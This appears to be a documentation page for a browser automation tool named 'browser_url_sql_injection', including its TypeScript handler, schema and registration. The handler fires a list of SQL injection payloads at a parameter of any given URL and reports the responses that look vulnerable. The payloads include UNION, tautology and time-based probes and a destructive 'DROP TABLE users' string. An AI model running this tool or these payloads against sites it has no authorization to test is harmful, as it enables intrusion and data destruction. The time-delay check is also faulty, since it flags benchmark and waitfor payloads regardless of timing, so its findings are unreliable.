browser_url_sql_injection
Test URLs for SQL injection vulnerabilities by analyzing parameter inputs to identify potential security risks in web applications.
Instructions
Test whether the URL has SQL injection vulnerabilities
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | ||
| paramName | No | Parameter name for SQL injection testing |
Implementation Reference
- index.ts:616-719 (handler)Handler function that tests the provided URL for SQL injection vulnerabilities by appending various SQL payloads to the specified parameter, navigating to the test URLs, and checking for SQL error patterns, response content differences, and time-based delays.case ToolName.BrowserUrlSqlInjection: { const baseUrl = args.url; const paramName = args.paramName || 'id'; const sqlPayloads = [ "1' OR '1'='1", "1' OR '1'='1' --", "1' OR '1'='1' #", "1; DROP TABLE users--", "1 UNION SELECT null,null,null--", "1' UNION SELECT null,null,null--", "admin' --", "admin' #", "' OR 1=1--", "' OR 'x'='x", "1' AND SLEEP(5)--", "1' AND BENCHMARK(5000000,MD5(1))--", "1' WAITFOR DELAY '0:0:5'--" ]; let vulnerablePayloads = []; let originalResponse = ''; try { // 首先获取原始响应 await page.goto(baseUrl); originalResponse = await page.content(); } catch (error) { console.error(`Error getting original response: ${error}`); } for (const payload of sqlPayloads) { const encodedPayload = encodeURIComponent(payload); const testUrl = `${baseUrl}${baseUrl.includes('?') ? '&' : '?'}${paramName}=${encodedPayload}`; try { const startTime = Date.now(); await page.goto(testUrl); const endTime = Date.now(); const responseTime = endTime - startTime; const newResponse = await page.content(); // 检查SQL错误关键字 const sqlErrorPatterns = [ /SQL syntax/i, /MySQL/i, /ORA-[0-9][0-9][0-9][0-9]/, /PostgreSQL/i, /SQLite/i, /SQLSTATE/, /Microsoft SQL/i, /ODBC Driver/i, /DB2 SQL/i, /Warning.*mysql_/i, /Warning.*pg_/i, /Warning.*sqlite_/i ]; const hasError = sqlErrorPatterns.some(pattern => pattern.test(newResponse)); // 检查响应差异 const isDifferent = originalResponse !== newResponse; // 检查时间延迟(针对基于时间的注入) const hasTimeDelay = responseTime > 5000 && payload.toLowerCase().includes('sleep') || payload.toLowerCase().includes('benchmark') || payload.toLowerCase().includes('waitfor'); if (hasError || isDifferent || hasTimeDelay) { vulnerablePayloads.push({ payload: payload, url: testUrl, reason: [ hasError ? '发现SQL错误信息' : '', isDifferent ? '响应内容发生变化' : '', hasTimeDelay ? '发现时间延迟' : '' ].filter(Boolean).join(', ') }); } } catch (error) { console.error(`Error testing payload ${payload}: ${error}`); } } if (vulnerablePayloads.length > 0) { return { content: [{ type: "text", text: `发现潜在的SQL注入漏洞!\n\n可能的漏洞点:\n${vulnerablePayloads.map(v => `Payload: ${v.payload}\nURL: ${v.url}\n原因: ${v.reason}\n` ).join('\n')}` }], isError: false }; } else { return { content: [{ type: "text", text: "未发现明显的SQL注入漏洞。" }], isError: false }; } }
- index.ts:169-177 (schema)Input schema defining the parameters for the browser_url_sql_injection tool: url (required) and optional paramName.inputSchema: { type: "object", properties: { url: { type: "string" }, paramName: { type: "string", description: "Parameter name for SQL injection testing" }, }, required: ["url"], }, },
- index.ts:166-178 (registration)Tool registration in the TOOLS array, including name, description, and input schema.{ name: ToolName.BrowserUrlSqlInjection, description: "Test whether the URL has SQL injection vulnerabilities", inputSchema: { type: "object", properties: { url: { type: "string" }, paramName: { type: "string", description: "Parameter name for SQL injection testing" }, }, required: ["url"], }, }, ];
- index.ts:34-34 (helper)Enum constant defining the tool name string.BrowserUrlSqlInjection = "browser_url_sql_injection"